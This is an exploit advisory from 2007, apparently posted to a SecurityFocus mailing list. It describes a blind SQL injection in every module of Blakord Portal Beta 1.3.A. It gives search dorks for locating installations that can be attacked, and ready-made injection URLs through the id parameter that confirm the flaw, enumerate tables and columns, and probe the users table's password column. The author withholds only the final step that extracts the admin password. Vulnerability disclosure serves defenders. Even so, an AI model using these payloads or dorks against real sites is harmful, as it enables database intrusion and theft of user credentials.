Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection Dec 26 2007 10:32PM
sys-project hotmail com
Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection.

[+] Info:

[~] Software: Blakord Portal

[~] HomePage: http://www.cdv3k.com

[~] Exploit: Blind Sql Injection [High]

[~] Where: All Modules

[~] Bug Found By: JosS / Jose Luis Góngora Fernández

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[~] Dork: "Power by Blakord Portal"

[~] Dork2: "Powered by Blakord Portal"

[~] Dork3: "Blakord Portal"

[+] Compression:

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1

[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploding:

[*] Checking table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0

[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])

[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0

[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)

[~] If you don't see any error, it is tha table exist.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]

[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6

[~] If you don't see any error, the table has 6 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0

[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0

[~] If you don't see any error, the column exists.

[*] Admin Password; Noob or Lammer?:

[~] Exploit: Priv8

[~] Example: Priv8

[~] Priv8 , xD.

[+] [The End]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus